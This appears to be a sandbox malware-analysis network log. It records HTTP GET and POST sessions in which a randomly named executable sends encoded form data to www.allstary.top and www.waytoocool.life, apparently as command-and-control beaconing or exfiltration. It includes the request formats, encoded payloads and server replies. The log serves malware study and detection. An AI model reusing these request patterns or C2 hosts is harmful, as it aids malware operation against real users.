                                                Data Ascii: -V8=jMlbVATxhHWMO72Dc/51fKKlPcBEzzh2d8VpYG56BommAR9X0ZPt923RGwXmE52Jajmfh7J3HF33wS4kZIVVddEGHlgsS3tmEGf9IKaNRkHBAb/JX9q2YSSv0pRE4ogOxZIDU/ZHOhsuoNunazSVuC8voZXziEwCLP8g6X/xvWuAhJhzq3aOiuT3oUzfkloRr43o84hhUZi4pSOf3oZoSD+P7SodVzAU9iUnQqVVXMwR5U7PciR6FiEVZZ13nEA4gyvXrQ2tdFsDtvSd2fYDIFtbmyXsTqbzuWY85PaLU0piTyiWiR/yeE/aU0ERjLClZsJ5YkwOBLZ9oDNihX7wflF/OoHBDesqfRP2F0t/Oq7QnJ78bb5gR7DLMX4cvcPFU3+B1wQ2ZapLG3kvyg2Hi7Bhr7Y+9Y6PJCznDKnv4RzFGOUvDPi8GaFZdpt3fDdQJKdd7hAM80IrWewEf3j+Y4pMyRCwre0rW3No/Gpzj22iUOBy/2R8MKgS+onC0yXwsuZBxE8gyuVUH9cO5ZNaVbMBJIPAPXSAi9Rs5nvHpOxLi0GAkhBRZuOXjPa2dHsYj/p5wYVjaHahqZovFQIZ7M6sxgnunS1dwqvcT2obZg4zTfhWdFI3DBTGO3hE7cp37Am35Ry7zy8RIK3YS8CKOOAtomQQa8xluy0HyXI7R3obPDSivOYSuGBsIJ/7VU38+yua2CENuBB9rEzCfs41US6LRPE0st9dvuXQqf0B9hito5lqljW4Ch1poiSLVFLwnDlCYu8kvVy19zq7znzJtSpwXjdGeL2VATzumoOv22lT8eE9f0hw4T3Z862Vt9kftyMX5yw3E/noIPI9qXHswK2jUPN7ihK+4Zycj3pI2QLjk5K2URaw0aBv8qBGmP/Qc3X+cTkK61TlzQIBNMJdFM1kl5yxy9XkHgBoUlw3eWWhpsjU7ecXAyimFlaX1d5dTstrCYsi5SKYdxOqqAWcvCmpZuRmkIn2IA7q7wspdLiZ+Pfe [TRUNCATED]
                                                Dec 17, 2024 03:41:47.563179016 CET533INHTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:47 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.549902199.193.6.134804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:49.013583899 CET385OUTGET /83oq/?-V8=uON7WwvftimkH6+9fo1haamOfON2rQIMUfJSLV47BI3eNmd69pzs52jdBx/JPqPeVCXck41+K0Sv6SgSfr5VB9MDDVgyHUBPcljHHq+Df2KeZsyLZPWCaDvb78l21qpsnQ==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.allstary.top
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:41:50.236946106 CET548INHTTP/1.1 404 Not Found
                                                Date: Tue, 17 Dec 2024 02:41:50 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.54991852.60.87.163804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:56.111262083 CET649OUTPOST /nydx/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.waytoocool.life
                                                Origin: http://www.waytoocool.life
                                                Referer: http://www.waytoocool.life/nydx/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 6e 35 50 54 47 35 76 4f 64 37 4e 4e 46 34 41 45 76 42 4c 4b 52 38 6f 6e 43 49 48 66 45 74 31 49 33 45 74 2b 35 61 54 4d 46 6d 48 51 6a 51 59 4e 59 49 50 69 72 6c 76 4e 63 37 44 49 53 73 6b 72 56 4e 73 77 53 6f 45 69 66 37 4d 46 6f 51 6f 4c 6d 76 48 4e 31 7a 76 31 37 57 4c 4e 4b 70 43 58 62 64 35 6a 51 55 35 66 50 39 4b 48 6c 34 41 6d 4d 70 4d 44 59 41 4e 7a 58 70 38 52 64 79 6f 72 6f 2f 71 6a 55 75 5a 57 48 48 7a 36 55 58 59 75 68 4e 41 52 32 44 6a 39 39 42 67 34 51 52 59 79 4e 56 77 71 6e 61 33 4a 71 33 7a 76 2f 48 56 67 2f 42 6e 4a 79 4d 70 56 54 6c 59 73 67 4e 6f 43 67 38 2b 35 71 38 4d 3d
                                                Data Ascii: -V8=n5PTG5vOd7NNF4AEvBLKR8onCIHfEt1I3Et+5aTMFmHQjQYNYIPirlvNc7DISskrVNswSoEif7MFoQoLmvHN1zv17WLNKpCXbd5jQU5fP9KHl4AmMpMDYANzXp8Rdyoro/qjUuZWHHz6UXYuhNAR2Dj99Bg4QRYyNVwqna3Jq3zv/HVg/BnJyMpVTlYsgNoCg8+5q8M=
                                                Dec 17, 2024 03:41:57.208544016 CET295INHTTP/1.1 405 Not Allowed
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:41:57 GMT
                                                Content-Type: text/html
                                                Content-Length: 150
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.54992452.60.87.163804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:58.800487041 CET669OUTPOST /nydx/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.waytoocool.life
                                                Origin: http://www.waytoocool.life
                                                Referer: http://www.waytoocool.life/nydx/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 6e 35 50 54 47 35 76 4f 64 37 4e 4e 44 59 77 45 6a 47 66 4b 41 4d 6f 6b 4f 6f 48 66 64 64 31 45 33 45 68 2b 35 62 48 6c 46 51 76 51 36 79 51 4e 4b 5a 50 69 71 6c 76 4e 54 62 44 42 64 4d 6b 69 56 4e 77 53 53 70 49 69 66 37 59 46 6f 52 59 4c 6e 59 7a 4f 31 6a 76 7a 69 47 4c 50 56 5a 43 58 62 64 35 6a 51 55 74 6c 50 2b 36 48 6b 4c 59 6d 4d 4e 67 4d 57 67 4e 77 65 4a 38 52 5a 79 6f 6e 6f 2f 72 32 55 76 55 65 48 42 33 36 55 53 6b 75 67 63 41 53 38 44 6a 7a 7a 68 68 56 66 77 73 37 4b 46 67 44 6b 62 2b 33 71 6c 6a 71 33 52 6b 4b 6c 6a 76 68 68 73 46 74 44 32 51 62 78 39 4a 72 36 66 75 4a 30 72 61 45 56 4b 56 37 32 48 49 66 53 49 66 36 54 33 35 2b 61 74 6b 35
                                                Data Ascii: -V8=n5PTG5vOd7NNDYwEjGfKAMokOoHfdd1E3Eh+5bHlFQvQ6yQNKZPiqlvNTbDBdMkiVNwSSpIif7YFoRYLnYzO1jvziGLPVZCXbd5jQUtlP+6HkLYmMNgMWgNweJ8RZyono/r2UvUeHB36USkugcAS8DjzzhhVfws7KFgDkb+3qljq3RkKljvhhsFtD2Qbx9Jr6fuJ0raEVKV72HIfSIf6T35+atk5
                                                Dec 17, 2024 03:41:59.898473978 CET295INHTTP/1.1 405 Not Allowed
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:41:59 GMT
                                                Content-Type: text/html
                                                Content-Length: 150
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.54993152.60.87.163804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:42:01.467783928 CET1686OUTPOST /nydx/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.waytoocool.life
                                                Origin: http://www.waytoocool.life
                                                Referer: http://www.waytoocool.life/nydx/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 6e 35 50 54 47 35 76 4f 64 37 4e 4e 44 59 77 45 6a 47 66 4b 41 4d 6f 6b 4f 6f 48 66 64 64 31 45 33 45 68 2b 35 62 48 6c 46 51 6e 51 6d 58 63 4e 59 71 33 69 74 6c 76 4e 65 37 44 4d 64 4d 6c 69 56 4e 6f 57 53 70 30 79 66 2b 63 46 6f 32 77 4c 76 4a 7a 4f 2f 6a 76 7a 2f 57 4c 4b 4b 70 43 47 62 63 56 6e 51 55 39 6c 50 2b 36 48 6b 4b 6f 6d 63 4a 4d 4d 47 51 4e 7a 58 70 38 56 64 79 70 77 6f 2f 79 4e 55 76 42 38 45 78 58 36 55 79 55 75 69 71 30 53 30 44 6a 78 2b 42 68 4e 66 77 78 6a 4b 46 38 68 6b 62 4b 4e 71 6e 44 71 6d 55 52 33 79 6a 7a 70 67 39 56 68 4f 6c 6b 65 74 4e 56 78 39 66 36 5a 72 73 50 6d 66 70 68 4f 33 79 45 76 57 70 75 67 48 52 5a 5a 61 37 52 69 36 51 58 73 4c 72 51 30 6a 54 6b 4c 36 58 71 5a 58 4c 66 6a 58 42 54 4c 44 70 6d 37 62 6c 65 35 30 34 47 51 6a 6c 66 54 57 61 54 4d 50 70 30 63 4c 30 64 6f 46 6b 44 44 6f 2b 2f 74 37 57 4e 79 6a 64 31 4c 58 43 68 50 5a 69 44 57 6e 58 68 73 7a 7a 64 64 70 2b 6d 54 68 4a 34 4d 4c 61 66 48 32 41 6b 35 4c 51 54 4e 37 34 71 46 51 68 45 35 73 59 [TRUNCATED]
                                                Data Ascii: -V8=n5PTG5vOd7NNDYwEjGfKAMokOoHfdd1E3Eh+5bHlFQnQmXcNYq3itlvNe7DMdMliVNoWSp0yf+cFo2wLvJzO/jvz/WLKKpCGbcVnQU9lP+6HkKomcJMMGQNzXp8Vdypwo/yNUvB8ExX6UyUuiq0S0Djx+BhNfwxjKF8hkbKNqnDqmUR3yjzpg9VhOlketNVx9f6ZrsPmfphO3yEvWpugHRZZa7Ri6QXsLrQ0jTkL6XqZXLfjXBTLDpm7ble504GQjlfTWaTMPp0cL0doFkDDo+/t7WNyjd1LXChPZiDWnXhszzddp+mThJ4MLafH2Ak5LQTN74qFQhE5sY0SQsf/wowDQmswq6X4zJWv1pw9+dZFsv3tvLZbn53GiuNJD8FrMe6GD2u+8eI8lYHyhqO8+OvldiCNOx8gbfvxtILfA3PiNTG9+79b6BHGPxFBkqluVbCi/D4PNRBjYulXcYHDqSZqoGo4fF2ots/cG83DRHzZLB8RLcgr4hk21zUjX3yd+qkMmmGp+dMX5KBm8H0gD1gUoZxSTo0dMn8RrKhAlJl0cy6kQU2ApxInPkG0P7KFxLglbDqWwdRgp+0Nk1BEJJXrgjdPgfDFTkPdt4UjzVRMsYwD0ZoVavIgO8+JyZ5pN30DX8rC9MQoJAVgFWXgaYRqPfJktqEL4JaIE7JnPsVzUM4EUb6W7gfe+OSH30PHCSJmKHa1/yS279iNws02UFAyl3C/cMA7VAXPpFubColUh28rE8iOphyvoop5U01qXIem2Dlyf2XBmZshnQZ6va/astgoJ/MvfeDNOXzf8FeiPAOuVXK84/SoCcCgE1/9ksXmS+VDkDJKuxXubOwnadq3MksIsisAqHo6Cefc6CEqw/4nEKF9/GJG/4MG9ksGM3EsWg7FHNPXO6bIMEGGmfQMmyl7McFO3dxmwKxSa9EVmJw3EFq3CEXfrypIvyrY74lo7DqOIJ0AbIUM7I5tE2UK8njpizN1vClafRpBuHVCAEXX [TRUNCATED]
                                                Dec 17, 2024 03:42:02.625368118 CET295INHTTP/1.1 405 Not Allowed
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:02 GMT
                                                Content-Type: text/html
                                                Content-Length: 150
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.54994152.60.87.163804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:42:04.124947071 CET388OUTGET /nydx/?-V8=q7nzFJj3afdOFJJfiG7XJfkkRIbmdsBL0Xh9x7HOO1bMwAYpIu+EkXrpUMzqVtVwT+pWdZ8+fZkDpnUDi5L0pxX3zg/WB9ChebFWf29eE9HJh+d3M/EMfjpTQLNaei8vxw==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.waytoocool.life
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:42:05.227713108 CET1236INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 17704
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: max-age=604800
                                                Expires: Sun, 22 Dec 2024 23:38:04 +0000
                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' https://park.101datacenter.net https://*.deviceatlascloud.com/ https://cs.deviceatlas-cdn.com data:
                                                Access-Control-Allow-Origin: https://park.101datacenter.net
                                                X-Frame-Options: SAMEORIGIN
                                                X-Cached: HIT
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 75 74 75 72 65 20 68 6f 6d 65 20 6f 66 20 77 61 79 74 6f 6f 63 6f 6f 6c 2e 6c 69 66 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 52 65 67 69 73 74 72 61 74 69 6f 6e 20 2d 20 72 65 67 69 73 74 65 72 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 6c 69 6e 65 2c 61 6e 64 20 67 65 74 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 77 61 6e 74 20 77 68 69 6c 65 20 69 74 27 73 20 73 74 69 6c 6c 20 61 76 61 69 6c 61 62 6c 65 2e 20 49 6e 74 65 72 6e 65 74 20 44 6f 6d 61 69 6e 20 52 65 67 69 73 74 72 61 74 69 6f 6e 20 26 20 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 20 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 52 65 67 69 73 74 72 61 74 69 6f 6e 2e 22 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html dir="ltr" lang="en" ><head><title>Future home of waytoocool.life</title><meta name="description" content="Domain Name Registration - register your domain name online,and get the name you want while it's still available. Internet Domain Registration & International Domain Name Registration."><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" /><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /><meta name="robots" content="index, follow" /><meta name="googlebot" content="index, follow" /><meta NAME="revisit-after" CONTENT="15 days"><script type="text/javascript">resource_url = decodeU
                                                Dec 17, 2024 03:42:05.227760077 CET224INData Raw: 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 27 68 74 74 70 73 25 33 41 25 32 46 25 32 46 70 61 72 6b 2e 31 30 31 64 61 74 61 63 65 6e 74 65 72 2e 6e 65 74 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74
                                                Data Ascii: RIComponent('https%3A%2F%2Fpark.101datacenter.net');</script><link rel="shortcut icon" href="https://park.101datacenter.net/images/vendor-1/icon/101domain.ico"><link rel="preload" as="font" type="font/woff2" crossorigin="
                                                Dec 17, 2024 03:42:05.227838993 CET1236INData Raw: 61 6e 6f 6e 79 6d 6f 75 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 2e 31 30 31 64 61 74 61 63 65 6e 74 65 72 2e 6e 65 74 2f 63 73 73 2f 66 6f 6e 74 73 2f 4c 61 74 6f 52 65 67 75 6c 61 72 2e 77 6f 66 66 32 22 20 2f 3e 0a 3c 6c
                                                Data Ascii: anonymous" href="https://park.101datacenter.net/css/fonts/LatoRegular.woff2" /><link rel="preload" as="image" type="image/webp" href="https://park.101datacenter.net/images/vendor-1/park-back.webp" /><style type="text/css">@font-face{font-fa
                                                Dec 17, 2024 03:42:05.227982044 CET1236INData Raw: 65 64 2c 2e 70 61 67 65 2d 73 65 63 74 69 6f 6e 2e 63 65 6e 74 65 72 65 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 63 65 6e 74 65 72 7d 2e 70 61 67 65 2d 68 65 61 64 65 72 20 68 31 7b 63 6f 6c 6f
                                                Data Ascii: ed,.page-section.centered{text-align:center;align-self:center}.page-header h1{color:#6dcff6;font-size:1.5rem;font-weight:400;line-height:1.4;margin:2rem 0}.page-header h1 strong{color:#fff;display:block}.choice .col-base{background-color:#fff;
                                                Dec 17, 2024 03:42:05.227991104 CET1236INData Raw: 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 72 65 6d 7d 2e 75 70 73 65 6c 6c 20 68 33 20 69 6d 67 7b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68
                                                Data Ascii: :center;justify-content:center;font-size:1.1rem}.upsell h3 img{height:1.5rem;width:auto}.upsell h3 svg{height:1.5rem;width:1.5rem;fill:#00aeef;margin-right:.5rem}.upsell p{font-size:.9rem;line-height:1.4;margin:0 0 1.5rem 0}.upsell .button{bac
                                                Dec 17, 2024 03:42:05.228246927 CET1236INData Raw: 6c 6c 20 2e 63 6f 6c 2d 62 61 73 65 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 75 70 73 65 6c 6c 20 2e
                                                Data Ascii: ll .col-base:last-child{border-right:none;padding-right:0;margin-right:0}.upsell .button:hover{background-color:#f0db64}}@media only screen and (min-width:55.063em) and (max-width:77em){.upsell h3{min-height:3rem}}@media only screen and (min-w
                                                Dec 17, 2024 03:42:05.228256941 CET1236INData Raw: 2d 69 63 6f 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 37 2e 38 33 20 32 32 2e 32 37 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 32 32 2c 38 2e 33 35 68 2d 36 2e 36 31 76 32 2e 34 34 63 30 2c 31 2e 37 33 2d 31 2e 34 2c 33 2e 31 33 2d
                                                Data Ascii: -icon" viewBox="0 0 27.83 22.27"><path d="M21.22,8.35h-6.61v2.44c0,1.73-1.4,3.13-3.13,3.13s-3.13-1.4-3.13-3.13V5.5l-2.82,1.7C4.69,7.69,4.18,8.6,4.18,9.58v2.06 L0.7,13.64c-0.67,0.38-0.9,1.24-0.51,1.9l3.48,6.03c0.38,0.67,1.23,0.89,1.9,0.51l4.5-
                                                Dec 17, 2024 03:42:05.228266001 CET1236INData Raw: 0a 3c 70 61 74 68 20 64 3d 22 4d 31 33 2e 39 2c 31 31 2e 33 37 63 33 2e 31 37 2c 30 2c 35 2e 37 33 2d 32 2e 35 34 2c 35 2e 37 33 2d 35 2e 36 38 43 31 39 2e 36 33 2c 32 2e 35 34 2c 31 37 2e 30 36 2c 30 2c 31 33 2e 39 2c 30 63 2d 33 2e 31 37 2c 30
                                                Data Ascii: <path d="M13.9,11.37c3.17,0,5.73-2.54,5.73-5.68C19.63,2.54,17.06,0,13.9,0c-3.17,0-5.73,2.54-5.73,5.68 C8.16,8.82,10.73,11.37,13.9,11.37z M10.31,5.79l0.52-0.52c0.14-0.14,0.38-0.14,0.52,0l1.62,1.61l3.47-3.44 c0.14-0.14,0.38-0.14,0.52,0l0.52,0.5
                                                Dec 17, 2024 03:42:05.228593111 CET1236INData Raw: 30 2c 31 2e 35 32 2c 31 2e 32 35 2c 32 2e 37 37 2c 32 2e 37 37 2c 32 2e 37 37 68 32 32 2e 31 34 63 31 2e 35 32 2c 30 2c 32 2e 37 37 2d 31 2e 32 35 2c 32 2e 37 37 2d 32 2e 37 37 76 2d 30 2e 36 39 43 32 37 2e 36 38 2c 32 32 2e 38 2c 32 37 2e 33 37
                                                Data Ascii: 0,1.52,1.25,2.77,2.77,2.77h22.14c1.52,0,2.77-1.25,2.77-2.77v-0.69C27.68,22.8,27.37,22.49,26.99,22.49z M13.84,11.41 c3.15,0,5.71-2.55,5.71-5.71S16.99,0,13.84,0c-3.15,0-5.71,2.55-5.71,5.71S10.69,11.41,13.84,11.41z M11.5,4.28 c-0.11-0.11-0.11-0.2
